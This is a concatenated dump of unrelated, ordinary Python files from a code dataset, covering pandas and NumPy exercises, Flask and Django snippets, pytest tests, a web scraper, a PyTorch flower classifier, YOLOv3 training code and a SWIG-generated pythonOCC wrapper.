#data=pd.Series([5,2,1,-5,9,8411],index=["a","sa","s","asse","ss","f"])
#print(data)
import pandas as pd
data=pd.DataFrame({
"name":["nimo","bob","opt"],
"ioi":["sPOf","asoid","saprmf"],
},index=["a","b","c",])
#print(data)
#print("------------------")
#print(data.iloc[2],sep="\n")
#print(data.loc["c"],sep="\n")
#print(data.shape)
#print(data.index)
print(data["name"],sep="\n")
iooi=data["name"]
print("把name全部轉大寫",iooi.str.upper(),sep="\n")
data["jump"]=[5500,500,90]
data["cp"]=data["jump"]
print(data)
|
23,517 | 2a122828dfb06c45254801d9f9d2618c0a6cd6f7 | from flask import Flask, render_template
app = Flask(__name__)
@app.route('/<name>/')
def home(name):
return render_template('homepage.html', name=name)
@app.route("/<name>", methods=['GET', 'POST'])
def picture(name):
return render_template('homepage.html', name=name)
if __name__ == '__main__':
app.debug = True
app.run()
|
23,518 | 01b9fd22dfaa23bd0d34e0ecb06d703f02495ea3 | # Imports here
import torch
import numpy as np
from torch import nn
from torch import optim
import torch.nn.functional as F
from torchvision import datasets, transforms, models
from collections import OrderedDict
from workspace_utils import active_session
from PIL import Image
import sys
import os
import json
# Define class for flower prediction model
class FlowerPredictionModel:
# Model class constructor
def __init__(self, gpu):
''' Initialise model object
'''
# Set device
if (gpu):
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
else:
self.device = "cpu"
# Function to build model
def build(self, arch, learning_rate, hidden_units):
''' Function to build model
'''
print('Building model...')
# Select & load pre-trained model
try:
arch = arch.lower()
self.model = models.__dict__[arch](pretrained=True)
self.arch = arch
except:
print("Model " + arch + " not recognised: please refer to documentation for valid model names in pytorch ie vgg16 https://pytorch.org/docs/stable/torchvision/models.html")
sys.exit()
self.hidden_units = hidden_units
self.learning_rate = learning_rate
# Freeze parameters of pre-trained model part by removing gradients
for param in self.model.parameters():
param.requires_grad = False
# Determine classifier input units for selected model
if hasattr(self.model, "classifier"):
try:
classifier_input_neurons = self.model.classifier[0].in_features
except TypeError:
classifier_input_neurons = self.model.classifier.in_features
elif hasattr(self.model, "fc"):
classifier_input_neurons = self.model.fc.in_features
else:
print("Unable to determine classifier input units number - unable to create model")
return
# Classifier architecture parameters
classifier_output_neurons = 102
classifier_dropout = 0.2
# Build new classifier for recognising flowers to work with model
self.model.classifier = nn.Sequential(OrderedDict([
('fc1', nn.Linear(classifier_input_neurons, hidden_units)),
('relu', nn.ReLU()),
('dropout', nn.Dropout(classifier_dropout)),
('fc2', nn.Linear(hidden_units, classifier_output_neurons)),
('output', nn.LogSoftmax(dim=1))]))
# Define model loss function
self.criterion = nn.NLLLoss()
# Define training function: only train the classifier parameters, feature parameters are frozen
self.optimizer = optim.Adam(self.model.classifier.parameters(), lr=learning_rate)
# Move model to current device
self.model.to(self.device)
# Function to train model
def train(self, epochs, trainloader, validloader, class_to_idx):
''' Function to train model
'''
print('Training model...')
# Set variables
self.epochs = epochs
self.training_steps = 0
training_loss = 0
print_every = 20
self.model.class_to_idx = class_to_idx
# Train network
# Ensure notebook session stays active through long runs
with active_session():
# For each training pass of whole dataset/epoch
for epoch in range(epochs):
print(f"Epoch {epoch+1}")
print("-------")
# For each training batch/step of images & labels
for inputs, labels in trainloader:
# Increment training steps count
self.training_steps += 1
# Move data and label tensors to device
inputs, labels = inputs.to(self.device), labels.to(self.device)
# Clear gradients
self.optimizer.zero_grad()
# Do forward pass through network
logps = self.model(inputs)
# Calculate loss for whole network
loss = self.criterion(logps, labels)
# Calculate gradients for each element to be trained by network (weights & biases)
loss.backward()
# Do back-propogation step: apply negative gradients to weights & biases
self.optimizer.step()
# Accumulate training loss
training_loss += loss.item()
# Every 20 training steps, validation check & output stats
if self.training_steps % print_every == 0:
valid_loss = 0
accuracy = 0
# Switch to evaluation mode - dropout inactive
self.model.eval()
# Disable gradients - not needed for modal validation/prediction
with torch.no_grad():
# For each validation batch of images & labels
for inputs, labels in validloader:
# Move data and label tensors to device
inputs, labels = inputs.to(self.device), labels.to(self.device)
# Do forward pass through network
logps = self.model.forward(inputs)
# Calculate loss for network
batch_loss = self.criterion(logps, labels)
# Accumulate validation loss
valid_loss += batch_loss.item()
# Calculate stats
# Get actual probabilties output from network for this batch
ps = torch.exp(logps)
# Get top probability/prediction for each image in batch
top_p, top_class = ps.topk(1, dim=1)
# Check each prediction against label (accuracy)
equals = top_class == labels.view(*top_class.shape)
# Calculate mean accuracy for this batch
accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
# Output stats for current training step
print(f"Training step {self.training_steps}")
print(f"Training loss: {training_loss/print_every:.3f} - "
f"Validation loss: {valid_loss/len(validloader):.3f} - "
f"Validation accuracy: {accuracy/len(validloader):.3f}")
# Validation end - reset training loss & set model back to training mode
training_loss = 0
self.model.train()
# Function to test model
def test(self, testloader):
''' Function to test model
'''
print('Testing model...')
accuracy = 0
# Switch to evaluation mode - dropout inactive
self.model.eval()
# Disable gradients - not needed for modal testing/prediction
with torch.no_grad():
# For each test batch of images & labels
for inputs, labels in testloader:
# Move data and label tensors to device
inputs, labels = inputs.to(self.device), labels.to(self.device)
# Do forward pass through network
logps = self.model.forward(inputs)
# Calculate stats
# Get actual probabilties output from network for this batch
ps = torch.exp(logps)
# Get top probability/prediction for each image in batch
top_p, top_class = ps.topk(1, dim=1)
# Check each prediction against label (accuracy)
equals = top_class == labels.view(*top_class.shape)
# Calculate mean accuracy for this batch
accuracy += torch.mean(equals.type(torch.FloatTensor)).item()
else:
# Output accuracy for entire test dataset
print(f"Test accuracy: {accuracy/len(testloader):.3f}")
# Function to save model
def save(self, save_dir):
''' Function to save model
'''
print('Saving model...')
# If save dir set
if (save_dir):
save_dir = save_dir + '/'
# If it does not exist
if (not os.path.isdir(save_dir)):
# Make dir
try:
os.mkdir(save_dir)
except OSError:
print ("Creation of the directory %s failed" % save_dir)
print ("Model was not saved")
sys.exit()
# Define checkpoint parameters
checkpoint = {'class_to_idx': self.model.class_to_idx,
'model_state_dict': self.model.state_dict(),
'arch': self.arch,
'learning_rate': self.learning_rate,
'hidden_units': self.hidden_units,
'epochs': self.epochs,
'training_steps': self.training_steps}
# Save it
torch.save(checkpoint, save_dir + 'checkpoint.pth')
# Function to save model
def load(self, save_dir):
''' Function to load model
'''
print('Loading model...')
# Load checkpoint
if torch.cuda.is_available():
checkpoint = torch.load(save_dir + 'checkpoint.pth')
else:
checkpoint = torch.load(save_dir + 'checkpoint.pth', map_location=lambda storage, loc: storage)
# Create model
self.build(checkpoint['arch'], checkpoint['learning_rate'], checkpoint['hidden_units'])
# Load classifier state values from checkpoint
self.model.load_state_dict(checkpoint['model_state_dict'])
self.model.class_to_idx = checkpoint['class_to_idx']
def predict(self, np_image, topk):
''' Predict the class (or classes) of an image using a trained deep learning model.
'''
print('Model predicting...')
# Convert image to tensor
image_tensor = torch.from_numpy(np_image)
# Add batch dimension to tensor
image_tensor = image_tensor.unsqueeze_(0)
# Convert to float tensor
image_tensor = image_tensor.float()
# Switch to evaluation mode - dropout inactive
self.model.eval()
# Disable gradients - not needed for model prediction
with torch.no_grad():
# Do forward pass through network
logps = self.model.forward(image_tensor)
# Get actual probabilties output from network for this image
ps = torch.exp(logps)
# Get topk probability/prediction for this image
top_p, top_class = ps.topk(topk, dim=1)
top_p = top_p.numpy()
top_class = top_class.numpy()
# Invert class map
idx_to_class = {j: i for i, j in self.model.class_to_idx.items()}
# Map indexes to get true class indexes
top_classes = [idx_to_class[index] for index in top_class[0]]
# Return probabilties and classes
return top_p[0], top_classes
def predict_image(self, image_path, np_image, top_k, category_names_json):
print('Testing model prediction...')
# Get image file parts
image_filename = image_path.split('/')[-2]
# Get prediction of image
probs, classes = self.predict(np_image, top_k)
print(" ")
# If category names set
if (category_names_json):
with open(category_names_json, 'r') as f:
cat_to_name = json.load(f)
classes = [cat_to_name[x] for x in classes]
print("Actual flower category: " + cat_to_name[image_filename])
print("Categories predicted")
print(classes)
print("Probabilities of categories predicted")
print(probs)
|
23,519 | 3f1a88b13c8ee02e4af09f7aaded05a1260f3e7f | from django.contrib import admin
from .models import Art, TheUser
# Register your models here.
admin.site.register(Art)
admin.site.register(TheUser)
|
23,520 | 92a0972e7e8654c76d3ea37f39aaaef14b62019c | #Addition (+)
#Multiplication (*)
a = "Python"
b = "Programming"
c = a+b
print(c)
d = a*2
print(d) |
23,521 | db8442b9a085c10f9b125eee69f07449da7b014e |
def setup_module(module):
print("setup_module")
def teardown_module(module):
print("teardown_module")
class TestClass:
@classmethod
def setup_class(cls):
print("setup_class")
@classmethod
def teardown_class(cls):
print("teardown_class")
def setup_method(self):
pass
def setup_method(self, method):
if method == self.test1:
print("setup_method-test1")
elif method == self.test2:
print("setup_method-test2")
else:
print("setup_method-unknown!")
def teardown_method(self, method):
if method == self.test1:
print("teardown_method-test1")
elif method == self.test2:
print("teardown_method-test2")
else:
print("teardown_method-unknown!")
def test1(self):
print("test1")
assert True
def test2(self):
print("test2")
assert True
|
23,522 | aa57e54665449c3cc07d9a3319f82f07e15e8af4 | import os
import signal
from pathlib import Path
import utils
def stop():
path = Path("famdb.pid")
if path.exists():
file = open("famdb.pid")
pid = int(list(file)[0])
serverRunning = utils.isPidRunning(pid)
file.close()
if serverRunning:
os.kill(pid, signal.SIGKILL)
os.remove("famdb.pid")
return
else:
print('FATAL:PID file detected, but no running process found')
return
|
23,523 | 1202864d9e77cb020c74b59abd042620335d305c | import shutil, os, datetime, time
#import Filecopy_drill
source = "C:\\Folder A\\"
dest = "C:\\Folder B\\"
files = os.listdir(source)
files.sort()
for f in files:
src = source +f
dst = dest +f
shutil.move(src, dst)
print "Moved file: %s from %s to %s " %(f, source, dest)
|
23,524 | 97d081f67764060128b916850af5f9c3dbf1b7c1 | import requests
from bs4 import BeautifulSoup
import csv
import pandas as pd
def scrape():
index_url = "https://www.conservapedia.com/Special:AllPages"
index_page = requests.get(index_url)
index_soup = BeautifulSoup(index_page.text, "html.parser")
#print(index_soup)
link_sec = index_soup.find(class_="mw-allpages-chunk")
link_list = link_sec.find_all("a")
#print(link_list)
f = csv.writer(open("conservapedia.csv", "w"))
f.writerow(["page_title","page_link","page_contents"])
site_dict = {}
for link in link_list:
page_title = link.contents[0]
page_link = "https://www.conservapedia.com"+link.get("href")
site_dict[page_title] = page_link
for k,v in site_dict.items():
page = requests.get(v)
page_soup = BeautifulSoup(page.text, "html.parser")
page_body = page_soup.find(id="content")
page_content = page_body.find("div", class_="mw-content-ltr")
text = page_content.get_text()
f.writerow([k,v,text])
f.close()
return
scrape() |
23,525 | 0a0ebccb3182f36aee62d50078b387f578679aab | def test_quantity_of_money(client):
assert client.get("/quantity_of_money").data.decode() == "10000"
def test_put_money(client):
money = int(client.get("/quantity_of_money").data)
money = str(money + 100)
client.post("/put_money?amount=100")
assert client.get("/quantity_of_money").data.decode() == money
def test_get_profit(client):
assert client.get("/get_profit").data.decode() == "0"
client.post("/put_money?amount=100")
assert client.get("/get_profit").data.decode() == "0"
def test_type(client):
assert isinstance(client.get("/get_stocks").json, dict)
assert isinstance(client.get("/get_prices").json, dict)
def test_sell_nothing(client):
assert (
client.post("/sell_stocks?stock={}&amount={}".format("hor5", 1)).data.decode()
== "Failed"
)
def test_buy(client):
price_dict = client.get("/get_prices").json
price = price_dict["hor5"]
money = int(client.get("/quantity_of_money").data)
money = str(money - price)
client.post("/buy_stocks?stock={}&amount={}".format("hor5", 1))
assert client.get("/quantity_of_money").data.decode() == money
price_dict = client.get("/get_prices").json
price = price_dict["hor5"]
money = str(int(money) + price)
client.post("/sell_stocks?stock={}&amount={}".format("hor5", 1))
assert client.get("/quantity_of_money").data.decode() == money
|
23,526 | 893fe5404a09b5002ce1fbe39ccd3e8de6b23b53 | import numpy as np
arr = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
print('The shape of an array is the number of elements in each dimension.')
#Print the shape of a 2-D array
print(arr.shape)
#Print the shape of a 5-D array
arr = np.array([1, 2, 3, 4], ndmin=5)
print(arr)
print('shape of array :', arr.shape)
#Reshaping arrays
print('\n\nReshape From 1-D to 2-D')
arr = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])
newarr = arr.reshape(4, 3)
print(newarr)
print('\n\nReshape From 1-D to 3-D')
arr = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])
newarr = arr.reshape(2, 3, 2)
print(newarr)
#Returns Copy or View?
print('Base/Return Type of reshape:', newarr)
#Unknown Dimension
newarr = arr.reshape(2, 2, -1) #Numpy calculate the dimension
print(newarr)
|
23,527 | a171e943158df2b0ce22509d9b60914031ba4fcd | """
Retrain the YOLO model for your own dataset.
"""
import os
os.environ['CUDA_VISIBLE_DEVICES']='1'
import numpy as np
import keras.backend as K
import tensorflow as tf
K.set_image_data_format('channels_last')
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
tf.keras.backend.set_session(tf.Session(config=config))
from keras.layers import Input, Lambda
from keras.models import Model
from keras.optimizers import Adam
from keras.callbacks import TensorBoard, ModelCheckpoint, ReduceLROnPlateau, EarlyStopping
from yolo3.model import preprocess_true_boxes, yolo_body, tiny_yolo_body, yolo_loss
from yolo3.utils import get_random_data
def _main():
annotation_path = 'train.txt'
log_dir = 'logs/000/'
classes_path = 'model_data/classes.txt'
anchors_path = 'model_data/yolo_anchors.txt'
class_names = get_classes(classes_path)
num_classes = len(class_names)
anchors = get_anchors(anchors_path)
input_shape = (416,416) # multiple of 32, hw
is_tiny_version = len(anchors)==6 # default setting
if is_tiny_version:
model = create_tiny_model(input_shape, anchors, num_classes,
freeze_body=2, weights_path='model_data/tiny_yolo_weights.h5')
else:
model = create_model(input_shape, anchors, num_classes,
freeze_body=2, weights_path='model_data/yolo_weights.h5') # make sure you know what you freeze
logging = TensorBoard(log_dir=log_dir)
checkpoint = ModelCheckpoint(log_dir + 'ep{epoch:03d}-loss{loss:.3f}-val_loss{val_loss:.3f}.h5',
monitor='val_loss', save_weights_only=True, save_best_only=True, period=3)
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=3, verbose=1)
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=10, verbose=1)
val_split = 0.1
with open(annotation_path) as f:
lines = f.readlines()
np.random.seed(10101)
np.random.shuffle(lines)
np.random.seed(None)
num_val = int(len(lines)*val_split)
num_train = len(lines) - num_val
# Train with frozen layers first, to get a stable loss.
# Adjust num epochs to your dataset. This step is enough to obtain a not bad model.
if True:
model.compile(optimizer=Adam(lr=1e-3), loss={
# use custom yolo_loss Lambda layer.
'yolo_loss': lambda y_true, y_pred: y_pred})
batch_size = 32
print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))
model.fit_generator(data_generator_wrapper(lines[:num_train], batch_size, input_shape, anchors, num_classes),
steps_per_epoch=max(1, num_train//batch_size),
validation_data=data_generator_wrapper(lines[num_train:], batch_size, input_shape, anchors, num_classes),
validation_steps=max(1, num_val//batch_size),
epochs=50,
initial_epoch=0,
callbacks=[logging, checkpoint])
model.save_weights(log_dir + 'trained_weights_stage_1.h5')
# Unfreeze and continue training, to fine-tune.
# Train longer if the result is not good.
if True:
for i in range(len(model.layers)):
model.layers[i].trainable = True
model.compile(optimizer=Adam(lr=1e-4), loss={'yolo_loss': lambda y_true, y_pred: y_pred}) # recompile to apply the change
print('Unfreeze all of the layers.')
batch_size = 32 # note that more GPU memory is required after unfreezing the body
print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))
model.fit_generator(data_generator_wrapper(lines[:num_train], batch_size, input_shape, anchors, num_classes),
steps_per_epoch=max(1, num_train//batch_size),
validation_data=data_generator_wrapper(lines[num_train:], batch_size, input_shape, anchors, num_classes),
validation_steps=max(1, num_val//batch_size),
epochs=100,
initial_epoch=50,
callbacks=[logging, checkpoint, reduce_lr, early_stopping])
model.save_weights(log_dir + 'trained_weights_final.h5')
# Further training if needed.
def get_classes(classes_path):
'''loads the classes'''
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def get_anchors(anchors_path):
'''loads the anchors from a file'''
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def create_model(input_shape, anchors, num_classes, load_pretrained=True, freeze_body=2,
weights_path='model_data/yolo_weights.h5'):
'''create the training model'''
K.clear_session() # get a new session
image_input = Input(shape=(None, None, 3))
h, w = input_shape
num_anchors = len(anchors)
y_true = [Input(shape=(h//{0:32, 1:16, 2:8}[l], w//{0:32, 1:16, 2:8}[l], \
num_anchors//3, num_classes+5)) for l in range(3)]
model_body = yolo_body(image_input, num_anchors//3, num_classes)
print('Create YOLOv3 model with {} anchors and {} classes.'.format(num_anchors, num_classes))
if load_pretrained:
model_body.load_weights(weights_path, by_name=True, skip_mismatch=True)
print('Load weights {}.'.format(weights_path))
if freeze_body in [1, 2]:
# Freeze darknet53 body or freeze all but 3 output layers.
num = (185, len(model_body.layers)-3)[freeze_body-1]
for i in range(num): model_body.layers[i].trainable = False
print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))
model_loss = Lambda(yolo_loss, output_shape=(1,), name='yolo_loss',
arguments={'anchors': anchors, 'num_classes': num_classes, 'ignore_thresh': 0.5})(
[*model_body.output, *y_true])
model = Model([model_body.input, *y_true], model_loss)
return model
def create_tiny_model(input_shape, anchors, num_classes, load_pretrained=True, freeze_body=2,
weights_path='model_data/tiny_yolo_weights.h5'):
'''create the training model, for Tiny YOLOv3'''
K.clear_session() # get a new session
image_input = Input(shape=(None, None, 3))
h, w = input_shape
num_anchors = len(anchors)
y_true = [Input(shape=(h//{0:32, 1:16}[l], w//{0:32, 1:16}[l], \
num_anchors//2, num_classes+5)) for l in range(2)]
model_body = tiny_yolo_body(image_input, num_anchors//2, num_classes)
print('Create Tiny YOLOv3 model with {} anchors and {} classes.'.format(num_anchors, num_classes))
if load_pretrained:
model_body.load_weights(weights_path, by_name=True, skip_mismatch=True)
print('Load weights {}.'.format(weights_path))
if freeze_body in [1, 2]:
# Freeze the darknet body or freeze all but 2 output layers.
num = (20, len(model_body.layers)-2)[freeze_body-1]
for i in range(num): model_body.layers[i].trainable = False
print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))
model_loss = Lambda(yolo_loss, output_shape=(1,), name='yolo_loss',
arguments={'anchors': anchors, 'num_classes': num_classes, 'ignore_thresh': 0.7})(
[*model_body.output, *y_true])
model = Model([model_body.input, *y_true], model_loss)
return model
def data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes):
'''data generator for fit_generator'''
n = len(annotation_lines)
i = 0
while True:
image_data = []
box_data = []
for b in range(batch_size):
if i==0:
np.random.shuffle(annotation_lines)
image, box = get_random_data(annotation_lines[i], input_shape, random=True)
image_data.append(image)
box_data.append(box)
i = (i+1) % n
image_data = np.array(image_data)
box_data = np.array(box_data)
y_true = preprocess_true_boxes(box_data, input_shape, anchors, num_classes)
yield [image_data, *y_true], np.zeros(batch_size)
def data_generator_wrapper(annotation_lines, batch_size, input_shape, anchors, num_classes):
n = len(annotation_lines)
if n==0 or batch_size<=0: return None
return data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes)
class yolo_det(object):
def __init__(self,
all_file_path='/data/shuai_li/Thai-OCR-Dev/Models/all_index/all_file.npy',
):
self.all_file = np.load(all_file_path)
self.bad_cases = [
'/data/TH_ID/yezi_image/fd87e860dd6406b83a6306def091330e07000000000f892600000000020200a4.jpeg',
'/data/TH_ID/yezi_image/ab100cd6a06a1925089d0a726e2886280700000000225b2600000000020200e1.jpeg',
'/data/TH_ID/yezi_image/beb05d687a56ed4d3fb6d42347c003070700000000265c290000000002020035.jpeg',
'/data/TH_ID/yezi_image/bea43cfb264711b81fe0f49a358294e2070000000023857200000000020200bd.jpeg',
'/data/TH_ID/yezi_image/bcc900f84ed38e831cef76fc2bec6af707000000002631360000000002020033.jpeg',
'/data/TH_ID/yezi_image/beda194099d0e3a5265b8c98406f21600700000000456bd500000000020200e2.jpeg',
'/data/TH_ID/yezi_image/c27e1f836801414b07def809c78de13307000000003a1db2000000000202004a.jpeg',
'/data/TH_ID/yezi_image/be89e4e6ccfbce649201f60d40a1515007000000001e47a000000000020200f5.jpeg',
'/data/TH_ID/yezi_image/c6000ce57f232eacba3553a0dec2aacd0700000000663c3400000000020200b4.jpeg',
'/data/TH_ID/yezi_image/909fe765a7e5f00e0e9d26e386cb54ae07000000003da7660000000002020000.jpeg',
'/data/TH_ID/yezi_image/b549617924ae64a20bb5eb67bc2327050700000000371a460000000002020060.jpeg',
'/data/TH_ID/yezi_image/0634f63236f44d9304b077e83a2bc27307000000004794dc0000000002020042.jpeg',
'/data/TH_ID/yezi_image/c5c146e1bfc0c9b32f3aa8976cf29b5107000000000e55260000000002020089.jpeg',
'/data/TH_ID/yezi_image/d5c81669ec7b814eb251a1404581742607000000003e908300000000020200af.jpeg',
'/data/TH_ID/yezi_image/beefe0586919c7aa03ac76cc3ed94a2607000000005305e800000000020200f8.jpeg',
'/data/TH_ID/yezi_image/bc1bbb89472d3b380558159c87431f7507000000002498e900000000020200ff.jpeg',
'/data/TH_ID/yezi_image/c7ec8fec506ff0386c6e598542f5aaef070000000042aae900000000020200be.jpeg',
'/data/TH_ID/yezi_image/1995c377464e5e5df62f372487ac125c0700000000271f3c00000000020200b4.jpeg',
'/data/TH_ID/yezi_image/8a0ce2aee94518bbe6360c6db5b1e8f607000000004f673b0000000002020051.jpeg',
'/data/TH_ID/yezi_image/e6918b940c1b9c2ebdd1dfee0a885aad07000000002e62cb000000000202004e.jpeg',
'/data/TH_ID/yezi_image/be7292a0ac02dafda11a32189297a2b10700000000420a3c00000000020200a8.jpeg',
'/data/TH_ID/yezi_image/a440e562e074be208ee853f4b0d53f7f070000000028ed770000000002020013.jpeg',
]
self.anno_path=self.process()
def process(self):
if os.path.exists('model_data/annotations.txt'):
return 'model_data/annotations.txt'
f=open('model_data/annotations.txt','w',encoding='utf-8')
for line in self.all_file:
img_path = line.split('\t')[0]
if img_path.split('/')[2]!='TH_ID':continue
if img_path in self.bad_cases:continue
coords = np.array(line.split('\t')[-1].strip('\n').strip('\t').split(' '),dtype=np.int).reshape((-1,2))
xmin,ymin,xmax,ymax=np.min(coords[:4,0]),np.min(coords[:4,1]),np.max(coords[:4,0]),np.max(coords[:4,1])
f.write('{} {},{},{},{},{}\n'.format(
img_path,xmin,ymin,xmax,ymax,0
))
f.close()
return 'model_data/annotations.txt'
def train_yolov3(self):
classes_path = 'model_data/classes.txt'
anchors_path = 'model_data/yolo_anchors.txt'
class_names = get_classes(classes_path)
num_classes = len(class_names)
anchors = get_anchors(anchors_path)
input_shape = (416,416) # multiple of 32, hw
is_tiny_version = len(anchors)==6 # default setting
if is_tiny_version:
model = create_tiny_model(input_shape, anchors, num_classes,
freeze_body=2, weights_path='model_data/yolov3_trained_for_th_card_detection.h5')
else:
model = create_model(input_shape, anchors, num_classes,
freeze_body=2, weights_path='model_data/yolov3_trained_for_th_card_detection.h5') # make sure you know what you freeze
logging = TensorBoard(log_dir='logs')
checkpoint = ModelCheckpoint('model_data/yolov3_trained_for_th_card_detection.h5',
monitor='val_loss', save_weights_only=False, save_best_only=True, period=1,
verbose=1)
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=5, verbose=1)
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=20, verbose=1)
val_split = 0.1
if os.path.exists('model_data/train.npy') and os.path.exists('model_data/val.npy'):
train_data=np.load('model_data/train.npy')
val_data=np.load('model_data/val.npy')
else:
with open(self.anno_path) as f:
lines = f.readlines()
np.random.seed(10101)
np.random.shuffle(lines)
np.random.seed(None)
num_val = int(len(lines)*val_split)
num_train = len(lines) - num_val
train_data=np.array(lines[:num_train])
val_data=np.array(lines[num_train:])
np.save('model_data/train.npy',train_data)
np.save('model_data/val.npy',val_data)
model.compile(optimizer=Adam(lr=1e-3), loss={
# use custom yolo_loss Lambda layer.
'yolo_loss': lambda y_true, y_pred: y_pred})
batch_size = 32
print('Stage 1: Train on {} samples, val on {} samples, with batch size {}.'.format(len(train_data), len(val_data), batch_size))
model.fit_generator(data_generator_wrapper(train_data, batch_size, input_shape, anchors, num_classes),
steps_per_epoch=max(1, len(train_data)//batch_size),
validation_data=data_generator_wrapper(val_data, batch_size, input_shape, anchors, num_classes),
validation_steps=max(1, len(val_data)//batch_size),
epochs=50,
initial_epoch=0,
callbacks=[logging, checkpoint,reduce_lr,early_stopping])
for i in range(len(model.layers)):
model.layers[i].trainable = True
model.compile(optimizer=Adam(lr=1e-4), loss={'yolo_loss': lambda y_true, y_pred: y_pred}) # recompile to apply the change
batch_size = 32 # note that more GPU memory is required after unfreezing the body
print('Stage 2: Train on {} samples, val on {} samples, with batch size {}.'.format(len(train_data), len(val_data), batch_size))
model.fit_generator(data_generator_wrapper(train_data, batch_size, input_shape, anchors, num_classes),
steps_per_epoch=max(1, len(train_data)//batch_size),
validation_data=data_generator_wrapper(val_data, batch_size, input_shape, anchors, num_classes),
validation_steps=max(1, len(val_data)//batch_size),
epochs=300,
initial_epoch=0,
callbacks=[logging, checkpoint, reduce_lr, early_stopping])
if __name__ == '__main__':
app=yolo_det()
app.train_yolov3()
|
23,528 | 901223996067e5b12ddde11c620751e87d0f82da | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.1
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (3,0,0):
new_instancemethod = lambda func, inst, cls: _XCAFDoc.SWIG_PyInstanceMethod_New(func)
else:
from new import instancemethod as new_instancemethod
if version_info >= (2,6,0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_XCAFDoc', [dirname(__file__)])
except ImportError:
import _XCAFDoc
return _XCAFDoc
if fp is not None:
try:
_mod = imp.load_module('_XCAFDoc', fp, pathname, description)
finally:
fp.close()
return _mod
_XCAFDoc = swig_import_helper()
del swig_import_helper
else:
import _XCAFDoc
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError(name)
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
def _swig_setattr_nondynamic_method(set):
def set_attr(self,name,value):
if (name == "thisown"): return self.this.own(value)
if hasattr(self,name) or (name == "this"):
set(self,name,value)
else:
raise AttributeError("You cannot add attributes to %s" % self)
return set_attr
class SwigPyIterator(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _XCAFDoc.delete_SwigPyIterator
def __iter__(self): return self
SwigPyIterator.value = new_instancemethod(_XCAFDoc.SwigPyIterator_value,None,SwigPyIterator)
SwigPyIterator.incr = new_instancemethod(_XCAFDoc.SwigPyIterator_incr,None,SwigPyIterator)
SwigPyIterator.decr = new_instancemethod(_XCAFDoc.SwigPyIterator_decr,None,SwigPyIterator)
SwigPyIterator.distance = new_instancemethod(_XCAFDoc.SwigPyIterator_distance,None,SwigPyIterator)
SwigPyIterator.equal = new_instancemethod(_XCAFDoc.SwigPyIterator_equal,None,SwigPyIterator)
SwigPyIterator.copy = new_instancemethod(_XCAFDoc.SwigPyIterator_copy,None,SwigPyIterator)
SwigPyIterator.next = new_instancemethod(_XCAFDoc.SwigPyIterator_next,None,SwigPyIterator)
SwigPyIterator.__next__ = new_instancemethod(_XCAFDoc.SwigPyIterator___next__,None,SwigPyIterator)
SwigPyIterator.previous = new_instancemethod(_XCAFDoc.SwigPyIterator_previous,None,SwigPyIterator)
SwigPyIterator.advance = new_instancemethod(_XCAFDoc.SwigPyIterator_advance,None,SwigPyIterator)
SwigPyIterator.__eq__ = new_instancemethod(_XCAFDoc.SwigPyIterator___eq__,None,SwigPyIterator)
SwigPyIterator.__ne__ = new_instancemethod(_XCAFDoc.SwigPyIterator___ne__,None,SwigPyIterator)
SwigPyIterator.__iadd__ = new_instancemethod(_XCAFDoc.SwigPyIterator___iadd__,None,SwigPyIterator)
SwigPyIterator.__isub__ = new_instancemethod(_XCAFDoc.SwigPyIterator___isub__,None,SwigPyIterator)
SwigPyIterator.__add__ = new_instancemethod(_XCAFDoc.SwigPyIterator___add__,None,SwigPyIterator)
SwigPyIterator.__sub__ = new_instancemethod(_XCAFDoc.SwigPyIterator___sub__,None,SwigPyIterator)
SwigPyIterator_swigregister = _XCAFDoc.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
import OCC.Standard
import OCC.TDF
import OCC.TCollection
import OCC.MMgt
import OCC.TColStd
import OCC.gp
import OCC.Quantity
import OCC.TopoDS
import OCC.TopLoc
import OCC.TopAbs
import OCC.TDocStd
import OCC.Resource
import OCC.TopTools
import OCC.Message
XCAFDoc_ColorGen = _XCAFDoc.XCAFDoc_ColorGen
